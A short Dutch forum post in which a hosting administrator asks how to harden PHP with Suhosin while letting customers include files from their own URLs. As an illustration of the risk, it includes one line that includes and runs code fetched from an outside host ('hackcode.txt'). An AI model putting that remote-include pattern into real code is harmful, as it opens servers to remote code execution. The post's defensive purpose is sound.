Hoi,
Ik heb pas geleden suhosin geinstalleerd om php beter te beveiligen. Nu gaf dat wat problemen met klanten die remote inclusion gebruiken(welliswaar de url van hun eigen site).
Vroeg me af of dat acceptabel is of dat je mensen moet vertellen altijd include(../config.php) the gebruiken ipv. include(url/config.php). Technisch gezien kan je met 1 regel php al veel doen als je dit toestaat (<?php include http://url.com/hackcode.txt; ?> )
Het lijkt er trouwens op dat ik dit niet uit kan zetten in suhosin (er is alleen een whitelist optie) weet iemand een andere manier wellicht om remote inclusion toe te staan voor lokale url's only?
Alvast bedankt.

Likes:


Quote